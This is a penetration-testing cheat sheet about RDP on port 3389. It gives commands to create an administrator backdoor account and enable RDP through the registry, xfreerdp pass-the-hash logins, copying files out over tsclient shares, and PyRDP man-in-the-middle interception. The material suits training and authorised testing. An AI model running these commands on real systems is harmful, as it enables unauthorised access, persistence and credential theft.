Remote Desktop Protocol (RDP) – Port 3389

If you find .rdp files, see Mimikatz for Windows Credential Manager.

Bruteforce

See Crowbar.

Connect to RDP from Kali

Prerequisites

User needs to be in the “Remote Desktop Users” group to be able to log in.

net user /add myprecious MyPrecious123
net localgroup "Remote Desktop Users" myprecious /add
net user myprecious MyPrecious123 /add
net localgroup Administrators myprecious /add
net localgroup "Remote Desktop Users" myprecious /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user myprecious

rdesktop

Rdesktop is a basic Linux Remote desktop client.

rdesktop $IP -u <username>
rdesktop $IP -u <username> -p <password> -g 1024x768 -x 0x80

Sharing Kali directory /home/kali/share

Redirects a path to the share \\tsclient\<sharename> on the server (requires Windows XP or newer). The share name is limited to 8 characters.

rdesktop $IP -d <domain> -u <username> -r disk:myshare=/home/kali/share

Access the share on Windows

dir \\tsclient\myshare
copy <filename> \\tsclient\myshare\

Freerdp

Use FreeRDP, an X11 client already installed on Kali Linux.

man xfreerdp
xfreerdp /cert:ignore /f /u:${USER} /v:$IP
xfreerdp /cert:ignore /u:${USER} /pth:${NTLM_HASH} /v:${IP}
xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /pth:${NTLM_HASH} /v:${IP}
xfreerdp /cert:ignore /f /u:${USER} /p:${PASS} /v:$IP:$PORT
xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /v:$IP:3389 /drive:myshare,/home/kali/share
dir \\tsclient\myshare

Connect to RDP from Windows

Type rdp in the Windows search bar.

Remote Desktop Connection Manager

Local user

<machine name>\<username>
.\<username>

RDP Server

  • xrdp – Open-source Remote Desktop Protocol server
sudo apt install -y kali-desktop-xfce xorg xrdp
sudo systemctl enable xrdp --now

Will give the port used.

sudo systemctl status xrdp

Connect as usual with mstsc or rdesktop.

PyRDP attack tool

PyRDP is a Python Remote Desktop Protocol (RDP) Monster-in-the-Middle (MITM) tool and library.

Official Documentation

Installation

git clone https://github.com/gosecure/pyrdp.git
apt install python3.9-venv
cd pyrdp
python3 -m venv venv
source venv/bin/activate
pip3 install -U pip setuptools wheel
pip3 install -U -e '.[full]'

If you ever want to leave your virtual environment, you can simply deactivate it:

deactivate

Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.

cd pyrdp
python3 -m venv venv
source venv/bin/activate

Help

pyrdp-mitm.py -h

Monster-in-the-middle

pyrdp-mitm.py $IP
# For the replay
pyrdp-mitm.py -l 0.0.0.0:3389 <public IP>
Configure port forwarding in virtualbox or vmware:
Host port: 13389
guest port 3389